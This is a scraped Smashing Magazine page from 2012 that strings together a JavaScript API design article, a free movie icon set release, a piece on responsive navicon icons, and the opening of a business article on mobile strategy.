    JavaScript not being Python (and being light years away), we’re left with fewer choices to overcome the obstacle of “argument forests”. jQuery (and pretty much every other decent API out there) chose to work with the concept of “option objects”. The signature of jQuery.ajax() provides a pretty good example. Instead of accepting numerous arguments, we only accept an object:

    function nightmare(accepts, async, beforeSend, cache, complete, /* and 28 more */) {
      if (accepts === "text") {
        // prepare for receiving plain text
    function dream(options) {
      options = options || {};
      if (options.accepts === "text") {
        // prepare for receiving plain text

    Not only does this prevent insanely long function signatures, it also makes calling the function more descriptive:

    nightmare("text", true, undefined, false, undefined, /* and 28 more */);
      accepts: "text",
      async: true,
      cache: false

    Also, we do not have to touch the function signature (adding a new argument) should we introduce a new feature in a later version.

    Default Argument Values

    jQuery.extend(), _.extend() and Protoype’s Object.extend are functions that let you merge objects, allowing you to throw your own preset options object into the mix:

    var default_options = {
      accepts: "text",
      async: true,
      beforeSend: null,
      cache: false,
      complete: null,
      // …
    function dream(options) {
      var o = jQuery.extend({}, default_options, options || {});
    // make defaults public
    dream.default_options = default_options;
    dream({ async: false });
    // prints: "text"

    You’re earning bonus points for making the default values publicly accessible. With this, anyone can change accepts to “json” in a central place, and thus avoid specifying that option over and over again. Note that the example will always append || {} to the initial read of the option object. This allows you to call the function without an argument given.

    Good Intentions — a.k.a. “Pitfalls”

    Now that you know how to be truly flexible in accepting arguments, we need to come back to an old saying:

    “With great power comes great responsibility!”
    — Voltaire

    As with most weakly-typed languages, JavaScript does automatic casting when it needs to. A simple example is testing the truthfulness:

    var foo = 1;
    var bar = true;
    if (foo) {
      // yep, this will execute
    if (bar) {
      // yep, this will execute

    We’re quite used to this automatic casting. We’re so used to it, that we forget that although something is truthful, it may not be the boolean truth. Some APIs are so flexible they are too smart for their own good. Take a look at the signatures of jQuery.toggle():

    .toggle( /* int */ [duration] [, /* function */  callback] )
    .toggle( /* int */ [duration] [, /* string */  easing] [, /* function */ callback] )
    .toggle( /* bool */ showOrHide )

    It will take us some time decrypting why these behave entirely different:

    var foo = 1;
    var bar = true;
    var $hello = jQuery(".hello");
    var $world = jQuery(".world");

    We were expecting to use the showOrHide signature in both cases. But what really happened is $hello doing a toggle with a duration of one millisecond. This is not a bug in jQuery, this is a simple case of expectation not met. Even if you’re an experienced jQuery developer, you will trip over this from time to time.

    You are free to add as much convenience / sugar as you like — but do not sacrifice a clean and (mostly) robust API along the way. If you find yourself providing something like this, think about providing a separate method like .toggleIf(bool) instead. Whatever choice you make, keep your API consistent!


    Developing Possibilities

    With option objects, we’ve covered the topic of extensible configuration. Let’s talk about allowing the API user to extend the core and API itself. This is an important topic, as it allows your code to focus on the important things, while having API users implement edge-cases themselves. Good APIs are concise APIs. Having a hand full of configuration options is fine, but having a couple dozen of them makes your API feel bloated and opaque. Focus on the primary-use cases, only do the things most of your API users will need. Everything else should be left up to them. To allow API users to extend your code to suit their needs, you have a couple of options…


    Callbacks can be used to achieve extensibility by configuration. You can use callbacks to allow the API user to override certain parts of your code. When you feel specific tasks may be handled differently than your default code, refactor that code into a configurable callback function to allow an API user to easily override that:

    var default_options = {
      // ...
      position: function($elem, $parent) {
    function Widget(options) {
      this.options = jQuery.extend({}, default_options, options || {});
    Widget.prototype.create = function() {
      this.$container = $("<div></div>").appendTo(document.body);
      this.$thingie = $("<div></div>").appendTo(this.$container);
      return this;
    }; = function() {
      this.options.position(this.$thingie, this.$container);
      return this;
    var widget = new Widget({
      position: function($elem, $parent) {
        var position = $parent.position();
        // position $elem at the lower right corner of $parent
        position.left += $parent.width(); += $parent.height();

    Callbacks are also a generic way to allow API users to customize elements your code has created:

    // default create callback doesn't do anything
    default_options.create = function($thingie){};
    Widget.prototype.create = function() {
      this.$container = $("<div></div>").appendTo(document.body);
      this.$thingie = $("<div></div>").appendTo(this.$container);
      // execute create callback to allow decoration
      return this;
    var widget = new Widget({
      create: function($elem) {

    Whenever you accept callbacks, be sure to document their signature and provide examples to help API users customize your code. Make sure you’re consistent about the context (where this points to) in which callbacks are executed in, and the arguments they accept.


    Events come naturally when working with the DOM. In larger application we use events in various forms (e.g. PubSub) to enable communication between modules. Events are particularly useful and feel most natural when dealing with UI widgets. Libraries like jQuery offer simple interfaces allowing you to easily conquer this domain.

    Events interface best when there is something happening — hence the name. Showing and hiding a widget could depend on circumstances outside of your scope. Updating the widget when it’s shown is also a very common thing to do. Both can be achieved quite easily using jQuery’s event interface, which even allows for the use of delegated events: = function() {
      var event = jQuery.Event("widget:show");
      if (event.isDefaultPrevented()) {
        // event handler prevents us from showing
        return this;
      this.options.position(this.$thingie, this.$container);
      return this;
    // listen for all widget:show events
    $(document.body).on('widget:show', function(event) {
      if (Math.random() > 0.5) {
        // prevent widget from showing
      // update widget's data
      $(this).data("last-show", new Date());
    var widget = new Widget();;

    You can freely choose event names. Avoid using native events for proprietary things and consider namespacing your events. jQuery UI’s event names are comprised of the widget’s name and the event name dialogshow. I find that hard to read and often default to dialog:show, mainly because it is immediately clear that this is a custom event, rather than something some browser might have secretly implemented.


    Traditional getter and setter methods can especially benefit from hooks. Hooks usually differ from callbacks in their number and how they’re registered. Where callbacks are usually used on an instance level for a specific task, hooks are usually used on a global level to customize values or dispatch custom actions. To illustrate how hooks can be used, we’ll take a peek at jQuery’s cssHooks:

    // define a custom css hook
    jQuery.cssHooks.custombox = {
      get: function(elem, computed, extra) {
        return $.css(elem, 'borderRadius') == "50%"
          ? "circle"
          : "box";
      set: function(elem, value) { = value == "circle"
          ? "50%"
          : "0";
    // have .css() use that hook
    $("#some-selector").css("custombox", "circle");

    By registering the hook custombox we’ve given jQuery’s .css() method the ability to handle a CSS property it previously couldn’t. In my article jQuery hooks, I explain the other hooks that jQuery provides and how they can be used in the field. You can provide hooks much like you would handle callbacks:

    DateInterval.nameHooks = {
      "yesterday" : function() {
        var d = new Date();
        d.setTime(d.getTime() - 86400000);
        return d;
    DateInterval.prototype.start = function(date) {
      if (date === undefined) {
        return new Date(this.startDate.getTime());
      if (typeof date === "string" && DateInterval.nameHooks[date]) {
        date = DateInterval.nameHooks[date]();
      if (!(date instanceof Date)) {
        date = new Date(date);
      return this;
    var di = new DateInterval();

    In a way, hooks are a collection of callbacks designed to handle custom values within your own code. With hooks you can stay in control of almost everything, while still giving API users the option to customize.

    Generating Accessors


    Any API is likely to have multiple accessor methods (getters, setters, executors) doing similar work. Coming back to our DateInterval example, we’re most likely providing start() and end() to allow manipulation of intervals. A simple solution could look like:

    DateInterval.prototype.start = function(date) {
      if (date === undefined) {
        return new Date(this.startDate.getTime());
      return this;
    DateInterval.prototype.end = function(date) {
      if (date === undefined) {
        return new Date(this.endDate.getTime());
      return this;

    As you can see we have a lot of repeating code. A DRY (Don’t Repeat Yourself) solution might use this generator pattern:

    var accessors = ["start", "end"];
    for (var i = 0, length = accessors.length; i < length; i++) {
      var key = accessors[i];
      DateInterval.prototype[key] = generateAccessor(key);
    function generateAccessor(key) {
      var value = key + "Date";
      return function(date) {
        if (date === undefined) {
          return new Date(this[value].getTime());
        return this;

    This approach allows you to generate multiple similar accessor methods, rather than defining every method separately. If your accessor methods require more data to setup than just a simple string, consider something along the lines of:

    var accessors = {"start" : {color: "green"}, "end" : {color: "red"}};
    for (var key in accessors) {
      DateInterval.prototype[key] = generateAccessor(key, accessors[key]);
    function generateAccessor(key, accessor) {
      var value = key + "Date";
      return function(date) {
        // setting something up 
        // using `key` and `accessor.color`

    In the chapter Handling Arguments we talked about a method pattern to allow your getters and setters to accept various useful types like maps and arrays. The method pattern itself is a pretty generic thing and could easily be turned into a generator:

    function wrapFlexibleAccessor(get, set) {
      return function(name, value) {
        var map;
        if (jQuery.isPlainObject(name)) {
          // setting a map
          map = name;
        } else if (value !== undefined) {
          // setting a value (on possibly multiple names), convert to map
          keys = name.split(" ");
          map = {};
          for (var i = 0, length = keys.length; i < length; i++) {
            map[keys[i]] = value;
        } else {
          return, name);
        for (var key in map) {
, name, map[key]);
        return this;
    DateInterval.prototype.values = wrapFlexibleAccessor(
      function(name) { 
        return name !== undefined 
          ? this.values[name]
          : this.values;
      function(name, value) {
        this.values[name] = value;

    Digging into the art of writing DRY code is well beyond this article. Rebecca Murphey wrote Patterns for DRY-er JavaScript and Mathias Bynens’ slide deck on how DRY impacts JavaScript performance are a good start, if you’re new to the topic.

    The Reference Horror

    Unlike other languages, JavaScript doesn’t know the concepts of pass by reference nor pass by value. Passing data by value is a safe thing. It makes sure data passed to your API and data returned from your API may be modified outside of your API without altering the state within. Passing data by reference is often used to keep memory overhead low, values passed by reference can be changed anywhere outside your API and affect state within.

    In JavaScript there is no way to tell if arguments should be passed by reference or value. Primitives (strings, numbers, booleans) are treated as pass by value, while objects (any object, including Array, Date) are handled in a way that’s comparable to by reference. If this is the first you’re hearing about this topic, let the following example enlighten you:

    // by value
    function addOne(num) {
      num = num + 1; // yes, num++; does the same
      return num;
    var x = 0;
    var y = addOne(x);
    // x === 0 <--
    // y === 1
    // by reference
    function addOne(obj) {
      obj.num = obj.num + 1;
      return obj;
    var ox = {num : 0};
    var oy = addOne(ox);
    // ox.num === 1 <--
    // oy.num === 1

    The by reference handling of objects can come back and bite you if you’re not careful. Going back to the DateInterval example, check out this bugger:

    var startDate = new Date(2012, 0, 1);
    var endDate = new Date(2012, 11, 31)
    var interval = new DateInterval(startDate, endDate);
    endDate.setMonth(0); // set to january
    var days = interval.days(); // got 31 but expected 365 - ouch!

    Unless the constructor of DateInterval made a copy (clone is the technical term for a copy) of the values it received, any changes to the original objects will reflect on the internals of DateInterval. This is usually not what we want or expect.

    Note that the same is true for values returned from your API. If you simply return an internal object, any changes made to it outside of your API will be reflected on your internal data. This is most certainly not what you want. jQuery.extend(), _.extend() and Protoype’s Object.extend allow you to easily escape the reference horror.

    If this summary did not suffice, read the excellent chapter By Value Versus by Reference from O’Reilly’s JavaScript – The Definitive Guide.

    The Continuation Problem

    In a fluent interface, all methods of a chain are executed, regardless of the state that the base object is in. Consider calling a few methods on a jQuery instance that contain no DOM elements:

      // executed although there is nothing to execute against

    In non-fluent code we could have prevented those functions from being executed:

    var $elem = jQuery('.wont-find-anything');
    if ($elem.length) {

    Whenever we chain methods, we lose the ability to prevent certain things from happening — we can’t escape from the chain. As long as the API developer knows that objects can have a state where methods don’t actually do anything but return this;, everything is fine. Depending on what your methods do internally, it may help to prepend a trivial is-empty detection:

    jQuery.fn.somePlugin = function() {
      if (!this.length) {
        // "abort" since we've got nothing to work with
        return this;
      // do some computational heavy setup tasks
      for (var i = 10000; i > 0; i--) {
        // I'm just wasting your precious CPU!
        // If you call me often enough, I'll turn
        // your laptop into a rock-melting jet engine
      return this.each(function() {
        // do the actual job

    Handling Errors

    Fail Faster

    I was lying when I said we couldn’t escape from the chain — there is an Exception to the rule (pardon the pun ☺).

    We can always eject by throwing an Error (Exception). Throwing an Error is considered a deliberate abortion of the current flow, most likely because you came into a state that you couldn’t recover from. But beware — not all Errors are helping the debugging developer:

    // jQuery accepts this
    $(document.body).on('click', {});
    // on click the console screams
    //   TypeError: ((p.event.special[l.origType] || {}).handle || l.handler).apply is not a function 
    //   in jQuery.min.js on Line 3

    Errors like these are a major pain to debug. Don’t waste other people’s time. Inform an API user if he did something stupid:

    if ( !== '[object Function]') { // see note
      throw new TypeError("callback is not a function!");

    Note: typeof callback === "function" should not be used, as older browsers may report objects to be a function, which they are not. In Chrome (up to version 12) RegExp is such a case. For convenience, use jQuery.isFunction() or _.isFunction().

    Most libraries that I have come across, regardless of language (within the weak-typing domain) don’t care about rigorous input validation. To be honest, my own code only validates where I anticipate developers stumbling. Nobody really does it, but all of us should. Programmers are a lazy bunch — we don’t write code just for the sake of writing code or for some cause we don’t truly believe in. The developers of Perl6 have recognized this being a problem and decided to incorporate something called Parameter Constraints. In JavaScript, their approach might look something like this:

    function validateAllTheThings(a, b {where typeof b === "numeric" and b < 10}) {
      // Interpreter should throw an Error if b is
      // not a number or greater than 9

    While the syntax is as ugly as it gets, the idea is to make validation of input a top-level citizen of the language. JavaScript is nowhere near being something like that. That’s fine — I couldn’t see myself cramming these constraints into the function signature anyways. It’s admitting the problem (of weakly-typed languages) that is the interesting part of this story.

    JavaScript is neither weak nor inferior, we just have to work a bit harder to make our stuff really robust. Making code robust does not mean accepting any data, waving your wand and getting some result. Being robust means not accepting rubbish and telling the developer about it.

    Think of input validation this way: A couple of lines of code behind your API can make sure that no developer has to spend hours chasing down weird bugs because they accidentally gave your code a string instead of a number. This is the one time you can tell people they’re wrong and they’ll actually love you for doing so.

    Going Asynchronous

    So far we’ve only looked at synchronous APIs. Asynchronous methods usually accept a callback function to inform the outside world, once a certain task is finished. This doesn’t fit too nicely into our fluent interface scheme, though:

    Api.protoype.async = function(callback) {
      // do something asynchronous
      window.setTimeout(callback, 500);
      return this;
    Api.protoype.method = function() {
      return this;
    // running things
    api.async(function() {
    // prints: async(), method(), callback()

    This example illustrates how the asynchronous method async() begins its work but immediately returns, leading to method() being invoked before the actual task of async() completed. There are times when we want this to happen, but generally we expect method() to execute after async() has completed its job.

    Deferreds (Promises)

    To some extent we can counter the mess that is a mix of asynchronous and synchronous API calls with Promises. jQuery knows them as Deferreds. A Deferred is returned in place of your regular this, which forces you to eject from method chaining. This may seem odd at first, but it effectively prevents you from continuing synchronously after invoking an asynchronous method:

    Api.protoype.async = function() {
      var deferred = $.Deferred();
      window.setTimeout(function() {
        // do something asynchronous
      }, 500);
      return deferred.promise();
    api.async().done(function(data) {
    // prints: async(), callback(), method()

    The Deferred object let’s you register handlers using .done(), .fail(), .always() to be called when the asynchronous task has completed, failed, or regardless of its state. See Promise Pipelines In JavaScript for a more detailed introduction to Deferreds.

    Debugging Fluent Interfaces

    While Fluent Interfaces are much nicer to develop with, they do come with certain limitations regarding de-buggability.

    As with any code, Test Driven Development (TDD) is an easy way to reduce debugging needs. Having written URI.js in TDD, I have not come across major pains regarding debugging my code. However, TDD only reduces the need for debugging — it doesn’t replace it entirely.

    Some voices on the internet suggest writing out each component of a chain in their separate lines to get proper line-numbers for errors in a stack trace:

    This technique does have its benefits (though better debugging is not a solid part of it). Code that is written like the above example is even simpler to read. Line-based differentials (used in version control systems like SVN, GIT) might see a slight win as well. Debugging-wise, it is only Chrome (at the moment), that will show someError() to be on line four, while other browsers treat it as line one.

    Adding a simple method to logging your objects can already help a lot — although that is considered “manual debugging” and may be frowned upon by people used to “real” debuggers:

    DateInterval.prototype.explain = function() {
      // log the current state to the console
    var days = (new Date(2012, 0, 1))
      .until(2012, 11, 31) // returns DateInterval instance
      .explain() // write some infos to the console
      .days(); // 365

    Function names

    Throughout this article you’ve seen a lot of demo code in the style of Foo.prototype.something = function(){}. This style was chosen to keep examples brief. When writing APIs you might want to consider either of the following approaches, to have your console properly identify function names:

    Foo.prototype.something = (function something() {
      // yadda yadda
    Foo.prototype.something = function() {
      // yadda yadda
    Foo.prototype.something.displayName = "Foo.something";

    The first approach has its quirks due to hoisting — unless you wrap your declarations in parentheses like the example shows. The second option displayName was introduced by WebKit and later adopted by Firebug / Firefox. displayName is a bit more code to write out, but allows arbitrary names, including a namespace or associated object. Either of these approaches can help with anonymous functions quite a bit.

    Read more on this topic in Named function expressions demystified by kangax.

    Documenting APIs

    One of the hardest tasks of software development is documenting things. Practically everyone hates doing it, yet everybody laments about bad or missing documentation of the tools they need to use. There is a wide range of tools that supposedly help and automate documenting your code:

    At one point or another all of these tool won’t fail to disappoint. JavaScript is a very dynamic language and thus particularly diverse in expression. This makes a lot of things extremely difficult for these tools. The following list features a couple of reasons why I’ve decided to prepare documentation in vanilla HTML, markdown or DocBoock (if the project is large enough). jQuery, for example, has the same issues and doesn’t document their APIs within their code at all.

    1. Function signatures aren’t the only documentation you need, but most tools focus only on them.
    2. Example code goes a long way in explaining how something works. Regular API docs usually fail to illustrate that with a fair trade-off.
    3. API docs usually fail horribly at explaining things behind the scenes (flow, events, etc).
    4. Documenting methods with multiple signatures is usually a real pain.
    5. Documenting methods using option objects is often not a trivial task.
    6. Generated Methods aren’t easily documented, neither are default callbacks.

    If you can’t (or don’t) want to adjust your code to fit one of the listed documentation tools, projects like Document-Bootstrap might save you some time setting up your home brew documentation.

    Make sure your Documentation is more than just some generated API doc. Your users will appreciate any examples you provide. Tell them how your software flows and which events are involved when doing something. Draw them a map, if it helps their understanding of whatever it is your software is doing. And above all: keep your docs in sync with your code!

    Self-Explanatory Code

    Providing good documentation will not keep developers from actually reading your code — your code is a piece of documentation itself. Whenever the documentation doesn’t suffice (and every documentation has its limits), developers fall back to reading the actual source to get their questions answered. Actually, you are one of them as well. You are most likely reading your own code again and again, with weeks, months or even years in between.

    You should be writing code that explains itself. Most of the time this is a non-issue, as it only involves you thinking harder about naming things (functions, variables, etc) and sticking to a core concept. If you find yourself writing code comments to document how your code does something, you’re most likely wasting time — your time, and the reader’s as well. Comment on your code to explain why you solved the problem this particular way, rather than explaining how you solved the problem. The how should become apparent through your code, so don’t repeat yourself. Note that using comments to mark sections within your code or to explain general concepts is totally acceptable.


    • An API is a contract between you (the provider) and the user (the consumer). Don’t just change things between versions.
    • You should invest as much time into the question How will people use my software? as you have put into How does my software work internally?
    • With a couple of simple tricks you can greatly reduce the developer’s efforts (in terms of the lines of code).
    • Handle invalid input as early as possible — throw Errors.
    • Good APIs are flexible, better APIs don’t let you make mistakes.

    Continue with Reusable Code for good or for awesome (slides), a Talk by Jake Archibald on designing APIs. Back in 2007 Joshua Bloch gave the presentation How to Design A Good API and Why it Matters at Google Tech Talks. While his talk did not focus on JavaScript, the basic principles that he explained still apply.

    Now that you’re up to speed on designing APIs, have a look at Essential JS Design Patterns by Addy Osmani to learn more about how to structure your internal code.

    Thanks go out to @bassistance, @addyosmani and @hellokahlil for taking the time to proof this article.

    © Rodney Rehm for Smashing Magazine, 2012.

  • Freebie: Movie Icon Set (PSD Source, PNG, JPG)


    Today, we present yet another freebie — a free set of icons related to movies and television, designed by Samuray and released for Smashing Magazine and the design community. The icons are available in six different sizes as transparent PNG files, JPG files as well as Photoshop PSD source files. The icons are released under a Creative Commons Attribution license.

    Movie Icon Set

    Download The Set For Free!

    You can use this icon set freely for commercial and personal projects. Please link to this release post if you want to spread the word.


    Perhaps you’d like to showcase your interests in your portfolio, or perhaps an obscure indie filmmaker has asked you to put up a small site for their upcoming movie. Or maybe you are organizing a party and would like to invite your good ol’ friends or colleagues to a movie evening. Eventually you might end up looking for a set of original cinema or TV-related icons, and purchasing generic stock icons isn’t really an option. In these (and hopefully many other) cases, this icon set might be useful.

    This set contains 10 images related to film, movies and the movie-going experience. Each icon is available in six sizes: its original size, 256×256px, 128×128px, 64×64px, 32×32px and 16×16px. The icons included are:

    • Ticket
    • Anaglyph Glasses
    • Camera
    • Cinema Seat
    • Clapperboard
    • Soft Drink
    • Film Reel
    • Megaphone
    • Popcorn
    • TV Set

    The icons are licensed under the Creative Commons Attribution-ShareAlike 3.0 Unported license. You are free to distribute, transform, fiddle with and build them into your work, even commercially. However, please always credit the original designer of the set (in this case, Nikolay Kuchkarov).

    Free Movie Icon Set

    Behind The Design

    As always, here are some insights from the designer:

    “My inspiration was the Academic Icon Set. I saw this amazing set and decided to make my own, and today I am honored to share the results with you all. This icon set is the result of about a month of work, and I hope that you will love it!”

    — Nikolay Kuchkarov

    Also, you can watch the video of the design process for the icons below:

    Making of Clapperboard icon from Samuray on Vimeo.

    Making of Popcorn box icon from Samuray on Vimeo.

    Thanks, Nikolay! We sincerely appreciate your time and efforts!

    (jc) (vf)

    © Smashing Editorial for Smashing Magazine, 2012.

  • Design Patterns: The Semantic, Responsive Navicon


    Icons are scattered throughout our history as a species; early man painted pictures onto stone depicting their triumphs over their hunted prey, Egyptians had an icon-based writing system in their hieroglyphics, and in the early church the symbol of a fish represented a Christian meeting place or tomb. Icons have always served a definitive purpose throughout mankind’s history on this planet: to inform and instruct.

    Icons are still prominent today in our everyday lives, as they serve the same purpose as they always have. As the craftsmen of the Web industry, we must ensure that we use correct representations of actions to inform users of their consequences.

    As the Web has evolved over the years, we have established a (fairly) standard set of icons — a trash can or a cross has come to represent deleting or removing something; an envelope has become the indicator for a message or mail. These are little visual cues to help people along their way. Some icons have established such strong associations that they can exist on their own without supporting text, meaning, they can remove language barriers to form their own universal language. We need to use the right icons to communicate the right things.

    Today’s Web is in a transitional phase, probably the most groundbreaking phase since the Web standards movement — I would go as far as suggesting that we are in the middle of the Responsive Web Design movement. As we build responsively, our websites will appear differently on different devices and often behave differently too. Navigation menus in particular are elements that can change dramatically in responsive websites. The change from a large context to a small context often requires changing the navigation pattern to something rarely seen on the Web until the arrival of responsive design. As more and more responsive websites enter the public domain, the more people will see these newfangled navigation solutions, so they shouldn’t need to ask “What does that button do?”.

    There have been calls recently from Andy Clarke and Jeremy Keith to have a standard icon for revealing navigation in small contexts, and rightly so — this is a new technique and we need to set users’ expectations about the consequence of the reveal action.

    Three Horizontal Lines

    The majority of responsive websites that use an icon to represent a hidden menu opt for the three horizontal stripes — these include some high-profile websites like Starbucks and also popular apps like Facebook and Path. Part of its power lies in its versatility, as the icon itself doesn’t clearly represent a precise object nor method, which means it can be applied to a variety of navigation-based design patterns without showing a preference to a particular pattern. Its vagueness in shape doesn’t detract from its message as the icon is becoming an emerging standard. Like a new term appearing in our everyday language, we know what it means. And with high-profile websites throwing their weight behind it, so will average users over time.

    Let’s take a look at some examples if the horizontal lines being used in some responsive websites.

    Twitter Bootstrap
    Twitter’s bootstrap framework shows three horizontal lines as a visual cue for a sliding menu, revealing the main menu links which anchor to the various sections of the page.

    The Webdagene conference website also uses the same pattern for a similar reveal, but unlike Twitter’s Bootstrap the links open a new page instead of anchoring to sections. Two different approaches to navigation encompassed by the same icon.

    dConstruct 2012
    dConstruct uses the three horizontal lines to represent the menu revealed in an upward sliding transition. Note that even though the revealed items here are square in shape, they still use the horizontal lines to represent the menu.

    Golden Grid System
    Joni Korpi’s Golden Grid System uses the same icon but for a different purpose — pressing the button shows the gridlines for the currently active grid.

    The three lines icon isn’t the only indicator people are using in the wild — like the alternatives, it has its drawbacks. In iOS, three horizontal lines are used to signify the ability to re-arrange full-width list items. So perhaps this part of our icon language is still finding its feet.

    Alternative Patterns

    Cognition by Happy Cog
    There are alternative patterns in the wild that aren’t as common as Happy Cog’s grid icon. This could perhaps indicate something similar to a speed dial or home screen — a springboard to other destinations. On the other hand, it could mislead less experienced users to think they are leaving the website to go somewhere else.

    Sony also deviates from the three horizontal lines icon and opts for a plus icon to show their menu. While visually pleasing, the plus symbol signifies adding something and as such it might be sending out the wrong message to users, and not clearly articulate the resulting action.

    Nathan Sawaya
    Nathan Sawaya’s hidden menu is represented by a cog which also could cause confusion. In digital products, the cog icon has become the universal indicator for settings, options or for customization. It feels like it’s misrepresenting the action and consequence, and may only be pressed as a last resort or out of curiosity.

    MSN Olympics Coverage
    Governor Technology produced the MSN’s Olympics Coverage website which boasts a series of creative pattern translations that include the main navigation — represented by a downward arrow. The downward arrow is a safe bet, specifically in slide-down menus. It hints towards the consequence in the same way a <select> menu would.

    Microsoft recently launched a new responsive home for their products which was expertly designed and developed by Paravel using Microsoft’s new design language. The icon used to represent the menu in small contexts is a good example of “table of contents” metaphor which communicates that the click on the icon would lead to an overview of available navigation options.

    All these examples produce the same end result — you push a button, a menu appears. But there is a disparity in the way the action is presented. If icons are a language, then we are sending mixed messages where responsive navigation is concerned. We are dealing with new patterns, new techniques but so are the people on the other side of our products — they are closer to our interfaces than ever before. Today we are dealing with both those devices as well as touch-based interfaces where there is nothing between the user and the interface. The message we deliver needs to be consistent and clear, the icon is part of this message, part of the greater language. As Andy Clarke has already said: “We need a standard show icon for Responsive Web Design”.

    “Unless our navigation is arranged in a grid (and so we should use a grid icon), I’m putting my weight behind three lines because I think it’s most recognizable as navigation to the average person.”

    — Andy Clarke, We need a standard show navigation icon for Responsive Web Design.

    I would wager that the vast majority of users faced with a hidden menu in small contexts have already used the three lines pattern to navigate rather than the alternatives. With the sheer amount of users using apps like Facebook and Path, it’s safe to say that it’s an intuitive indicator. If we are to use this effectively in resolution independent responsive designs, then it needs to be represented in a scalable way, ensuring it stays legible regardless of the device where it is being displayed on. There are a number of ways we can do this.

    Pictographic Web Fonts

    “Don’t get hung up on ‘Retina’, worry about hi-res.”

    — Adam Bradley, Responding to the New High-Resolution Web.

    With different pixel densities cropping up, resolution independence is crucial to achieving a consistent experience regardless of the user’s context. It’s impossible to design for device dimensions and specific screen properties and stay future friendly at the same time. Scalable assets are key to staying ahead of the game, and one way to create them is to use pictographic Web fonts.

    In theory, you could create a font containing only one glyph to represent the menu indicator. It would be a light resource to load, but you would still be imposing an additional HTTP request on the user, which isn’t ideal (it would essentially be a hack). Additionally, if the user is on a very slow connection, then the icon may take time to load. During that time they may miss the menu option — we are talking about mere seconds and potentially fractions of seconds here — but this level of care and attention to detail is what defines you as a craftsman of the Web. After all, each decision you make directly affects the user on the other side of the screen.

    You could get around this by embedding the Web font using a data:URI which would save the additional HTTP request. This is fine in isolation, but if you are loading multiple data (URIs in different places), you run into issues regarding maintainability. Multiple font variations can also produce a page weight overhead that would render this approach pointless. So it all depends on the case for your individual use.

    In general, we should avoid loading a Web font solely for one glyph for use in displaying our responsive navigation icon. The page weight today is as important as it was when we were designing and building for dial-up connections, and latency is the new Web performance bottleneck, so keeping the webpage size small is still very important. The contrast in connection capabilities is larger than it has ever been and any unnecessary burdens on the user’s connection can have a negative impact on the user’s experience.

    However, it’s likely that you may be loading pictographic icons for other purposes in your project. If that is the case, then I see no harm in loading the set containing the three horizontal lines icon and making use of the range of glyphs at your disposal. Josh Emerson takes this a step further and has produced a fantastic walkthrough showing you how to create a font fit for purpose, containing only the glyphs that you need for your project (which consequently keeps resources light and page weight down). IcoMoon is a browser-based app that lets you do something similar by offering a library of pre-selected icons and the option to import SVGs to build your own font.

    Unicode Characters

    Standard system fonts provided us with a false glimmer of hope. The character entity “Chinese Trigram for Sky (Heaven)” (☰ (U+2630)) is exactly what we are looking for, only it doesn’t render correctly on Android devices. Jeremy Keith has done some research into platform and browser compatibility in his Navicon article, which concludes that the downward arrow character entity has better cross-platform and cross-browser compatibility for indicating a reveal menu. There are similarly suitable unicode characters like the character entity “Identical to“. This has much better support than the Trigram for Sky entity (although the geometric shapes aren’t quite in proportion with the icons we have become familiar with).

    Live demo

    You can see that the icon retains its sharpness when the user’s browser is zoomed, as a pictographic Web font would. Proportionally it isn’t ideal, although it may provide a good fallback to a more suitable technique.


    Tim Kadlec and Stu Robson have produced the navicon icon in CSS by making clever use of mixing border styles and the :before pseudo selector which works in all major device browsers. While this seems ideal, it isn’t exactly best practice, as we are using CSS to draw a graphic which resides somewhere in that blurred line of whether CSS generated “graphics” are presentational or not.

    Live demo

    When the browser zoom level is set to something other than a multiple of 100, the proportions between the generated lines become uneven, which wouldn’t happen in the other solutions presented here. I wouldn’t rule this approach out completely, however, as it serves as a solid workaround when the following approach fails.

    The SVG Approach

    Without doubt, SVG is a good fit for the purpose of crafting the icon. By definition, an icon is a picture or symbol to represent such an action, therefore a scalable vector graphic is the right tool for the job. The browser draws the SVG based on mathematical parameters, meaning that it is resolution independent. So it will look crisp on whatever pixel resolution or density it is presented on, making it a future friendly solution. Support for SVG is pretty good across the contexts we need it for (mainly mobile devices, although some versions of Android don’t support it).

    We can cater for browsers that don’t support SVGs by using feature detection. A custom build of Modernizr that only checks for SVG provides a lightweight way of testing support for the SVG — if the browser can serve SVGs, then the user should be shown the SVG image. And if the browser can’t, then it should revert to using a bitmap image. After loading Modernizr, checking for SVG support is simple:

    if (!Modernizr.svg) {
        $("#svg-icon").css("background-image", "url(fallback.png)");

    SVG isn’t widely utilized yet, not as much as it should be. Perhaps it is the lack of mainstream tools to create them. The tools do exist though, and we just need to look a bit harder to find them and grow accustomed to them — crafting SVGs should become second nature to us as we enter a new high-definition Web.

    Live demo

    The SVG icon stays sharp when loaded at any resolution, however when the page is zoomed after the initial load, the graphic can begin to blur in certain browsers at irregular zoom levels. The drawbacks in using SVG for retina graphics are found in its limitations for customization in the browser — for example, changing the color of the icon. What seems like a straightforward property change cannot be achieved without JavaScript intervention (or by loading an additional image) which means triggering another HTTP request. Furthermore, if HTTP requests are a concern and you want to load the SVG inline, you will have limited browser support — just be sure to use feature detection to cover all eventualities so the user’s experience isn’t affected. You can download the SVG icon and the PNG fallback.

    To Conclude

    After reading this you may feel like I’m over-analyzing something so small, and on the surface it may look insignificant when in fact it’s quite the opposite. Building responsively requires more care and attention than we have ever given to our craft. A mobile-first approach invites opportunities for the butterfly effect in our work, in which a bad decision that could impact page weight (or loading redundant resources) for small contexts could be detrimental to the user experience in small contexts and beyond. We, as craftsmen of the Web, have a duty to sensibly inform, instruct and exercise responsible Web design.

    Further Resources

    (jvb) (vf)

    © Jordan Moore for Smashing Magazine, 2012.

  • Business Strategy: Giving Our Clients The Best Deal In Mobile


    Are we cheating our clients when it comes to mobile? More precisely, are we allowing our desire for mobile work to get in the way of providing our clients with the best solution for their business needs? This is the uncomfortable question we asked ourselves recently when redesigning our agency’s website, and we want to discuss it with the broader Web community: You, dear reader.

    The recently relaunched Headscape website
    When redesigning our own website, we were forced to challenge our reasons for putting so much emphasis on mobile development.

    We are not for a minute suggesting that either we or anyone else is intentionally taking advantage of the current excitement about mobile to “con” our clients. However, we do wonder whether our clients’ excitement and our own desires are hindering our ability to make rational business decisions — decisions that would lead to the best solution for our clients.

    Jumping On The Band Wagon

    By now, we all know that mobile is the next big thing. Not only do we realize it, but our clients know it, too. The growth in smartphone usage and the availability of fast mobile Internet connections are driving an explosion in mobile Web access. Organizations of all shapes and sizes need to start taking mobile seriously or else suffer in the near future.

    Mobile growth infographic
    There can be little doubt that mobile is becoming a major way to access the Web. Image source:

